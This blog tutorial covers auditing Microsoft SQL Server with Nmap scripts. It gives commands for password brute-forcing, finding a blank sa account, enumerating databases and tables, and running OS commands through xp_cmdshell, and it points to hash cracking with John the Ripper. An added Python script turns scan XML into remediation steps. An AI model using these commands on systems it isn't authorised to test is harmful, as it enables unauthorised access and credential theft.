SQL Server pen test with Nmap and the Nmap Scripting Engine

The Nmap Scripting Engine (NSE) lets us use Nmap not just as a port scanner but as a complete penetration testing platform.

In this post we will cover some techniques we can apply to check our own SQL Server.

By default, Microsoft SQL Server listens on TCP port 1433.

Open a terminal and run the following command (xxx.xxx.xxx.xxx is the IP of the SQL Server):

nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx

The combination of Nmap and the Nmap Scripting Engine immediately gives us the SQL Server version as well as the instance name.


The Nmap Scripting Engine also includes the ms-sql-brute script, which tests for weak passwords.


The command is nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx. If it finds nothing, we can also supply a custom password list; assuming the file with the usernames and passwords is pass.txt, the command becomes:

nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx

The Nmap Scripting Engine also lets us find accounts with empty passwords on Microsoft SQL Server infrastructures.

The command is as follows:

nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx

Here we see that the sa account has no password. To find which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:

nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa xxx.xxx.xxx.xxx

Then we can list the tables in those databases with the following command:

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx

In older versions of MSSQL (SQL Server 2000) xp_cmdshell is enabled by default, so we can execute operating system commands through Nmap, for example:

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx

Continuing:

nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx
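The scan results above are only useful if they turn into a fix list for the servers we own. As an added example that is not part of the original post, the following Python script triages the XML that nmap writes with -oX after the ms-sql-info and ms-sql-empty-password scripts have run, and maps each host to the remediation its findings call for. The XML embedded in it is a constructed sample in nmap's XML shape (the host addresses, the elem keys "Version" and "Instance name", and the remediation wording are assumptions, not nmap's own output); the "=> Login Success" marker follows the ms-sql-empty-password output format.

```python
"""Triage the XML nmap writes with -oX after the ms-sql-* scripts have run.

Added example, not code from the original post. It assumes a scan such as
  nmap -p1433 --script ms-sql-info,ms-sql-empty-password -oX scan.xml <targets>
and reads the resulting <script> elements. SAMPLE_XML below is a constructed
sample in nmap's XML shape; the elem keys and addresses are assumptions.
"""
import xml.etree.ElementTree as ET

# Constructed sample: one host running SQL Server 2000 with a blank sa password
# and one current host with nothing to report.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="1433">
        <state state="open" reason="syn-ack"/>
        <service name="ms-sql-s"/>
        <script id="ms-sql-info" output="Version: Microsoft SQL Server 2000 SP4">
          <table key="10.0.0.5:1433">
            <elem key="Version">Microsoft SQL Server 2000 SP4</elem>
            <elem key="Instance name">MSSQLSERVER</elem>
          </table>
        </script>
        <script id="ms-sql-empty-password" output="[10.0.0.5:1433]&#10;  sa:&lt;empty&gt; =&gt; Login Success"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="1433">
        <state state="open" reason="syn-ack"/>
        <service name="ms-sql-s"/>
        <script id="ms-sql-info" output="Version: Microsoft SQL Server 2019">
          <table key="10.0.0.6:1433">
            <elem key="Version">Microsoft SQL Server 2019</elem>
            <elem key="Instance name">MSSQLSERVER</elem>
          </table>
        </script>
        <script id="ms-sql-empty-password" output="No credentials found"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# What a defender should do about each finding class (our wording, not nmap's).
REMEDIATION = {
    "empty-password": "set a strong password and disable or rename the sa login",
    "legacy-version": "SQL Server 2000 enables xp_cmdshell by default; upgrade and "
                      "confirm xp_cmdshell is off (sp_configure 'xp_cmdshell', 0)",
}


def parse_findings(xml_text):
    """Return one dict per host with an open 1433/tcp port, listing its issues."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("portid") != "1433" or state is None or state.get("state") != "open":
                continue
            entry = {"host": addr, "version": None, "instance": None,
                     "empty_password_accounts": [], "issues": []}
            for script in port.findall("script"):
                sid = script.get("id")
                output = script.get("output", "")
                if sid == "ms-sql-info":
                    # Structured output carries version and instance as <elem> children.
                    for elem in script.iter("elem"):
                        key = (elem.get("key") or "").lower()
                        if key == "version":
                            entry["version"] = (elem.text or "").strip()
                        elif key == "instance name":
                            entry["instance"] = (elem.text or "").strip()
                    if entry["version"] and "2000" in entry["version"]:
                        entry["issues"].append("legacy-version")
                elif sid == "ms-sql-empty-password":
                    # One "<user>:<empty> => Login Success" line per blank password.
                    for line in output.splitlines():
                        if "=> Login Success" in line:
                            entry["empty_password_accounts"].append(line.split(":", 1)[0].strip())
                    if entry["empty_password_accounts"]:
                        entry["issues"].append("empty-password")
            findings.append(entry)
    return findings


def report(findings):
    """Map each host with issues to the remediation text for those issues."""
    return {f["host"]: [REMEDIATION[i] for i in f["issues"]] for f in findings if f["issues"]}


if __name__ == "__main__":
    for host, actions in report(parse_findings(SAMPLE_XML)).items():
        print(host)
        for action in actions:
            print("  -", action)
```

Run it against a real scan by replacing SAMPLE_XML with the contents of the -oX file; hosts whose 1433/tcp port is closed or filtered are skipped, so only reachable instances appear in the report.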

We should also mention that Nmap and the Nmap Scripting Engine can be combined with other tools such as John the Ripper: with John the Ripper we can take the extracted password hashes and proceed to password cracking.


Warm thanks to SecTeam @johnzontos.


Written by Dimitris
